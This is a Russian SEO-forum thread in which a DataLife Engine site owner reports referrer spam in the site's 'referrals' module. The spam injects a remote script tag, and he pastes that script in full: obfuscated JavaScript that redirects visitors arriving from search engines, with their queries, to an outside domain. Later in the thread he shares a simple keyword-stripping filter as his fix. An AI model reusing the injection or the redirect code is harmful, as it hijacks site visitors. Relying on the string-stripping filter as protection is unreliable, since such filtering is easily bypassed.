И снова DLE - SEO форум MaulTalk.com

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

2 страниц

< 1 2

И снова DLE, Взлом или что-то другое?

Опции

elvis81

Topic Starter сообщение

29.9.2011, 21:54; Ответить: elvis81

Сообщение #11

Познающий

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 223 раза
Репутация:

Доброго времени суток, уважаемые форумчане.

Поднимаю вопрос потому как сам вообще не разбираюсь в програмировании и хотел бы спросить у людей знающих.

У меня есть сайт, не так давно я так же как и все DLEшники боролся с взломом и закрывал дыры движка.
Но вот опять твориться что-то странное.
В модуле "переходы" появляется переход с гугла но с сылкой вот такого вида

_http://сайт/%3E%3C/a%3E%3Cscript%20src=http://vgoru.net/l.js%3E%3C/script%3E%3Ca%20href=

Я конечно же перешёл, для того чтобы посмотреть что там такое но переходил напрямую http://vgoru.net/l.js
И увидел там вот такой код:

if (dle_login_hash=="" || dle_admin==""){
function i( string ){var ret='',i = 0;for ( i = string.length-1;i>=0;i--){ret+=string.charAt(i);}return ret;}function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.all-lots-many.ru/%27+%27%3Fwkey%3D"+l(i('dce54'))+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}}

То что я там увидел мне не очень понравилось, хотя я и непонял что это такое.

Вопрос: Что же это такое? И как оно может повредить (если повредит)?

PS: Если тему уже поднимали, то не пинайте сильно, а просто укажите ссылк на тему. Если нет то пожалуйста поясните чем это чревато?

Да забыл сказать что переходы выполняются с IP адреса очень странного вида "74.125.77.147..."

Сообщение отредактировал elvis81 - 29.9.2011, 21:57

--------------------

ТИц поднимают, поднималкой для ТИца

Ответить с цитированием данного сообщения

Аудитор Аудитор 30.9.2011, 14:59; Сообщений: 54 Поблагодарили: 13 раз Репутация: 2 Просмотр профиля	30.9.2011, 14:59; Ответить: Аудитор Сообщение #12
Частый гость Группа: User Сообщений: 54 Регистрация: 22.9.2011 Поблагодарили: 13 раз Репутация: 2	Модуль зло - один из моих сайтов так и не оправился.. после вирусов, начались постоянные проблемы с ранжированием.. сейчас уверенный АГС НИкогда и никакой версии больше ставить не буду. "Дырки", там не просто так поставлены. Причем, я две недели не замечал кликандера, очень хитро он себя вел. Вообще бесплатные модули - зло. Я в альтруистов не верю с садика. -------------------- Включайте голову. Овцы никогда не отведают мяса. а рекламы нет :)

lamov lamov 30.9.2011, 15:31; Сообщений: 270 Поблагодарили: 34 раза Репутация: 2 Просмотр профиля	30.9.2011, 15:31; Ответить: lamov Сообщение #13
Бывалый Группа: User Сообщений: 270 Регистрация: 6.7.2011 Из: Киев Поблагодарили: 34 раза Репутация: 2	я тогда переходил на 9.1 версию, сейчас поставил 8.9, да, багнутый, но больших сложностей с ним нет, как в новых версиях...нужно дорабатывать модуль.

elvis81

Topic Starter сообщение

5.11.2011, 10:00; Ответить: elvis81

Сообщение #14

Познающий

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 223 раза
Репутация:

Я тут немного освободившись поискал проблемму и решил её по дилетантски.
Так-как я програмировании полный НУБ то решение искал простое.
Все дыры латал как было в баг фиксах написно и ничего не помогало.
Но я нашёл самостоятельное решение.

Сразу же поделюсь с теми кто тоже может мучаться с такими же проблеммами.

Кстати запрос реф-спама изменился на:

http://сайт/></a><script src=http://womanan.ru/s.js></script><a href=

Я вбивал в гугле и не поверите как много сайтов заражены таким запросом.
И так это недостаточная фильтрация входящих данных.
У меня стоит очень старая версия модуля "Переходы", доработанная вручную.
Все исправления пытаются запретить запросы к базе данных и не один баг-фикс не заработал как нужно.
Я же решил просто запретить модулю "переходы" отображать некоторые символы и проблемма решилась.

Вот подробности:

Находим в файле site/engine/modules/referer.php

$http_referer = str_replace ('www.', '', $http_referer);

Ниже дописываем:

$http_referer = str_replace ('src=http://', '', $http_referer); # вырезаем src=http://
    $request_uri = str_replace ('src=http://', '', $request_uri); # вырезаем src=http://
    $request_uri = str_replace ('a href=', '', $request_uri); # вырезаем a href=
    $request_uri = str_replace ('.js', '', $request_uri); # вырезаем .js
    $http_referer = str_replace ('a href=', '', $http_referer); # вырезаем a href=
    $http_referer = str_replace ('.js', '', $http_referer); # вырезаем .js

И всё проблемма решена. Модуль просто перестаёт отображать эти запросы.

Нам же главное чтобы на сайте не отображались всякие гадостные скрипты.

Кстати, всем кто откликнулся и отписался в этом топике, большое спасибо.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

--------------------

ТИц поднимают, поднималкой для ТИца

« Предыдущая тема · Программная часть · Следующая тема »

2 страниц

< 1 2

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
DLE xProtect	2	xoopw	5977	15.1.2024, 21:06 автор: Diana_Wesley
Обновить сайт на CMS DLE	1	Sawich	1662	2.9.2023, 10:10 автор: WoWeb
Изготовление красивых сайтов на DLE под ключ \| Доступные цены от 2000 руб.	1	Admiral_ukr	1598	20.11.2022, 10:08 автор: Webmaster24
Ищу спеца по DLE вылечить сайт	4	Reactive	2640	22.10.2022, 9:01 автор: Fozik77
требуется перенос с Dle на wordpres нужен человек для переноса движка	5	Юрий82	1943	30.7.2022, 18:02 автор: Klerik84

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 19.4.2024, 17:46

Дизайн